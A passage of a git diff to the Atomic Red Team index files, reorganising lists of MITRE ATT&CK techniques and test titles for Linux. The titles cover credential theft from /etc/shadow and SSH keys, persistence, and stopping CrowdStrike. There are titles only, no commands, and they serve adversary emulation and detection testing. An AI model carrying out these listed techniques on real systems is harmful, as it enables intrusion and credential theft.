TEST](https://atomicredteam.io/contributing) - T1586.001 Social Media Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1608 Stage Capabilities [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1588.002 Tool [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1608.001 Upload Malware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1608.002 Upload Tool [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1583.003 Virtual Private Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1584.003 Virtual Private Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1588.006 Vulnerabilities [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -1305,10 +1346,16 @@ - T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1559.001 Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1175 Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1609 Container Administration Command](../../T1609/T1609.md) + - Atomic Test #1: ExecIntoContainer [linux, macos] +- [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md) + - Atomic Test #1: ListCronjobs [linux, macos] + - Atomic Test #2: CreateCronjob [linux, macos] - [T1053.003 Cron](../../T1053.003/T1053.003.md) - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] - Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux] +- T1610 Deploy Container [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1559.002 Dynamic Data Exchange](../../T1559.002/T1559.002.md) - Atomic Test #1: Execute Commands [windows] - Atomic Test #2: Execute PowerShell script via Word DDE [windows] @@ -1316,7 +1363,7 @@ - T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1061 Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1059.007 JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1059.007 JavaScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1569.001 Launchctl](../../T1569.001/T1569.001.md) - Atomic Test #1: Launchctl [macos] - [T1053.004 Launchd](../../T1053.004/T1053.004.md) @@ -1330,6 +1377,7 @@ - Atomic Test #6: Excel 4 Macro [windows] - Atomic Test #7: Headless Chrome code execution via VBA [windows] - Atomic Test #8: Potentially Unwanted Applications (PUA) [windows] +- T1204.003 Malicious Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1204.001 Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1106 Native API](../../T1106/T1106.md) - Atomic Test #1: Execution through API - CreateProcess [windows] diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md index 718a5e3a..24f9e6c5 100644 --- a/atomics/Indexes/Indexes-Markdown/linux-index.md +++ b/atomics/Indexes/Indexes-Markdown/linux-index.md @@ -1,121 +1,4 @@ # Linux Atomic Tests by ATT&CK Tactic & Technique -# privilege-escalation -- [T1546.004 .bash_profile and .bashrc](../../T1546.004/T1546.004.md) - - Atomic Test #1: Add command to .bash_profile [macos, linux] - - Atomic Test #2: Add command to .bashrc [macos, linux] -- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1053.001 At (Linux)](../../T1053.001/T1053.001.md) - - Atomic Test #1: At - Schedule a job [linux] -- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1053.003 Cron](../../T1053.003/T1053.003.md) - - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] - - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] - - Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux] -- T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1547.006 Kernel Modules and Extensions](../../T1547.006/T1547.006.md) - - Atomic Test #1: Linux - Load Kernel Module via insmod [linux] -- [T1574.006 LD_PRELOAD](../../T1574.006/T1574.006.md) - - Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux] - - Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux] -- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1055.009 Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1055 Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1548.001 Setuid and Setgid](../../T1548.001/T1548.001.md) - - Atomic Test #1: Make and modify binary from C source [macos, linux] - - Atomic Test #2: Set a SetUID flag on file [macos, linux] - - Atomic Test #3: Set a SetGID flag on file [macos, linux] -- [T1548.003 Sudo and Sudo Caching](../../T1548.003/T1548.003.md) - - Atomic Test #1: Sudo usage [macos, linux] - - Atomic Test #2: Unlimited sudo cache timeout [macos, linux] - - Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux] -- [T1543.002 Systemd Service](../../T1543.002/T1543.002.md) - - Atomic Test #1: Create Systemd Service [linux] -- [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md) - - Atomic Test #1: Create Systemd Service and Timer [linux] -- [T1546.005 Trap](../../T1546.005/T1546.005.md) - - Atomic Test #1: Trap [macos, linux] -- T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - -# persistence -- [T1546.004 .bash_profile and .bashrc](../../T1546.004/T1546.004.md) - - Atomic Test #1: Add command to .bash_profile [macos, linux] - - Atomic Test #2: Add command to .bashrc [macos, linux] -- T1098 Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1098.001 Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1053.001 At (Linux)](../../T1053.001/T1053.001.md) - - Atomic Test #1: At - Schedule a job [linux] -- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1542.003 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1176 Browser Extensions](../../T1176/T1176.md) - - Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos] - - Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos] - - Atomic Test #3: Firefox [linux, windows, macos] -- T1136.003 Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1136 Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1053.003 Cron](../../T1053.003/T1053.003.md) - - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] - - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] - - Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux] -- T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1136.002 Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1098.002 Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1133 External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1525 Implant Container Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1547.006 Kernel Modules and Extensions](../../T1547.006/T1547.006.md) - - Atomic Test #1: Linux - Load Kernel Module via insmod [linux] -- [T1574.006 LD_PRELOAD](../../T1574.006/T1574.006.md) - - Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux] - - Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux] -- [T1136.001 Local Account](../../T1136.001/T1136.001.md) - - Atomic Test #1: Create a user account on a Linux system [linux] - - Atomic Test #5: Create a new user in Linux with `root` UID and GID. [linux] -- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1137 Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1137.001 Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1137.002 Office Test [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1137.003 Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1137.004 Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1542.004 ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md) - - Atomic Test #1: Modify SSH Authorized Keys [macos, linux] -- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1505 Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1543.002 Systemd Service](../../T1543.002/T1543.002.md) - - Atomic Test #1: Create Systemd Service [linux] -- [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md) - - Atomic Test #1: Create Systemd Service and Timer [linux] -- T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1505.002 Transport Agent [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1546.005 Trap](../../T1546.005/T1546.005.md) - - Atomic Test #1: Trap [macos, linux] -- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1505.003 Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - # credential-access - [T1003.008 /etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) - Atomic Test #1: Access /etc/shadow (Local) [linux] @@ -125,12 +8,15 @@ - Atomic Test #1: Search Through Bash History [linux, macos] - T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1552.005 Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1552.007 Container API](../../T1552.007/T1552.007.md) + - Atomic Test #1: ListSecrets [macos, linux] - T1110.004 Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md) - Atomic Test #2: Extract passwords with grep [macos, linux] - T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1555.003 Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1056.001 Keylogging](../../T1056.001/T1056.001.md) - Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux] @@ -142,6 +28,7 @@ - T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1110.002 Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1110.001 Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1555.005 Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1110.003 Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1552.004 Private Keys](../../T1552.004/T1552.004.md) @@ -149,11 +36,13 @@ - Atomic Test #3: Copy Private SSH Keys with CP [linux] - Atomic Test #4: Copy Private SSH Keys with rsync [macos, linux] - T1003.007 Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1606.002 SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1528 Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1111 Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) # collection @@ -199,12 +88,68 @@ - T1213.002 Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +# privilege-escalation +- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1053.001 At (Linux)](../../T1053.001/T1053.001.md) + - Atomic Test #1: At - Schedule a job [linux] +- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md) + - Atomic Test #1: ListCronjobs [linux, macos] + - Atomic Test #2: CreateCronjob [linux, macos] +- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1053.003 Cron](../../T1053.003/T1053.003.md) + - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] + - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] + - Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux] +- T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1574.006 Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) + - Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux] + - Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux] +- T1611 Escape to Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1547.006 Kernel Modules and Extensions](../../T1547.006/T1547.006.md) + - Atomic Test #1: Linux - Load Kernel Module via insmod [linux] +- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1055.009 Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1055 Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1037.004 RC Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1548.001 Setuid and Setgid](../../T1548.001/T1548.001.md) + - Atomic Test #1: Make and modify binary from C source [macos, linux] + - Atomic Test #2: Set a SetUID flag on file [macos, linux] + - Atomic Test #3: Set a SetGID flag on file [macos, linux] +- [T1548.003 Sudo and Sudo Caching](../../T1548.003/T1548.003.md) + - Atomic Test #1: Sudo usage [macos, linux] + - Atomic Test #2: Unlimited sudo cache timeout [macos, linux] + - Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux] +- [T1543.002 Systemd Service](../../T1543.002/T1543.002.md) + - Atomic Test #1: Create Systemd Service [linux] +- [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md) + - Atomic Test #1: Create Systemd Service and Timer [linux] +- [T1546.005 Trap](../../T1546.005/T1546.005.md) + - Atomic Test #1: Trap [macos, linux] +- [T1546.004 Unix Shell Configuration Modification](../../T1546.004/T1546.004.md) + - Atomic Test #1: Add command to .bash_profile [macos, linux] + - Atomic Test #2: Add command to .bashrc [macos, linux] +- T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1547.013 XDG Autostart Entries [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) + # defense-evasion - T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1550.001 Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1027.001 Binary Padding](../../T1027.001/T1027.001.md) - Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [macos, linux] - T1542.003 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1612 Build Image on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1070.003 Clear Command History](../../T1070.003/T1070.003.md) - Atomic Test #1: Clear Bash history (rm) [linux, macos] - Atomic Test #2: Clear Bash history (echo) [linux] @@ -226,6 +171,7 @@ - T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1578.003 Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1140 Deobfuscate/Decode Files or Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1610 Deploy Container [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1562.008 Disable Cloud Logs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1600.002 Disable Crypto Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1562.007 Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -237,7 +183,12 @@ - Atomic Test #3: Disable SELinux [linux] - Atomic Test #4: Stop Crowdstrike Falcon on Linux [linux] - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1601.002 Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1574.006 Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) + - Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux] + - Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux] - T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -264,9 +215,6 @@ - [T1553.004 Install Root Certificate](../../T1553.004/T1553.004.md) - Atomic Test #1: Install root CA on CentOS/RHEL [linux] - Atomic Test #2: Install root CA on Debian/Ubuntu [linux] -- [T1574.006 LD_PRELOAD](../../T1574.006/T1574.006.md) - - Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux] - - Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux] - [T1222.002 Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) - Atomic Test #1: chmod - Change file or folder mode (numeric mode) [macos, linux] - Atomic Test #2: chmod - Change file or folder mode (symbolic mode) [macos, linux] @@ -389,12 +337,14 @@ - T1580 Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1538 Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1526 Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1613 Container and Resource Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1087.002 Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1069.002 Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1087.003 Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1083 File and Directory Discovery](../../T1083/T1083.md) - Atomic Test #3: Nix File and Diectory Discovery [macos, linux] - Atomic Test #4: Nix File and Directory Discovery 2 [macos, linux] +- T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1087.001 Local Account](../../T1087.001/T1087.001.md) - Atomic Test #1: Enumerate all accounts (Local) [linux] - Atomic Test #2: View sudoers access [linux, macos] @@ -433,6 +383,7 @@ - Atomic Test #5: Linux VM Check via Kernel Modules [linux] - Atomic Test #7: Hostname Discovery [linux, macos] - Atomic Test #11: Environment variables discovery on macos and linux [macos, linux] +- T1614 System Location Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1016 System Network Configuration Discovery](../../T1016/T1016.md) - Atomic Test #3: System Network Configuration Discovery [macos, linux] - [T1049 System Network Connections Discovery](../../T1049/T1049.md) @@ -443,6 +394,84 @@ - T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +# persistence +- T1098 Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1098.001 Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1053.001 At (Linux)](../../T1053.001/T1053.001.md) + - Atomic Test #1: At - Schedule a job [linux] +- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1542.003 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1176 Browser Extensions](../../T1176/T1176.md) + - Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos] + - Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos] + - Atomic Test #3: Firefox [linux, windows, macos] +- T1136.003 Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md) + - Atomic Test #1: ListCronjobs [linux, macos] + - Atomic Test #2: CreateCronjob [linux, macos] +- T1136 Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1053.003 Cron](../../T1053.003/T1053.003.md) + - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] + - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] + - Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux] +- T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1136.002 Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1574.006 Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) + - Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux] + - Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux] +- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1098.002 Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1133 External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1525 Implant Internal Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1547.006 Kernel Modules and Extensions](../../T1547.006/T1547.006.md) + - Atomic Test #1: Linux - Load Kernel Module via insmod [linux] +- [T1136.001 Local Account](../../T1136.001/T1136.001.md) + - Atomic Test #1: Create a user account on a Linux system [linux] + - Atomic Test #5: Create a new user in Linux with `root` UID and GID. [linux] +- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1556.004 Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1137 Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1137.001 Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1137.002 Office Test [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1137.003 Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1137.004 Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1037.004 RC Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1542.004 ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md) + - Atomic Test #1: Modify SSH Authorized Keys [macos, linux] +- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1505 Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1543.002 Systemd Service](../../T1543.002/T1543.002.md) + - Atomic Test #1: Create Systemd Service [linux] +- [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md) + - Atomic Test #1: Create Systemd Service and Timer [linux] +- T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1505.002 Transport Agent [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1546.005 Trap](../../T1546.005/T1546.005.md) + - Atomic Test #1: Trap [macos, linux] +- [T1546.004 Unix Shell Configuration Modification](../../T1546.004/T1546.004.md) + - Atomic Test #1: Add command to .bash_profile [macos, linux] + - Atomic Test #2: Add command to .bashrc [macos, linux] +- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1505.003 Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1547.013 XDG Autostart Entries [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) + # resource-development - T1583 Acquire Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1583.005 Botnet [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -458,11 +487,14 @@ - T1588.004 Digital Certificates 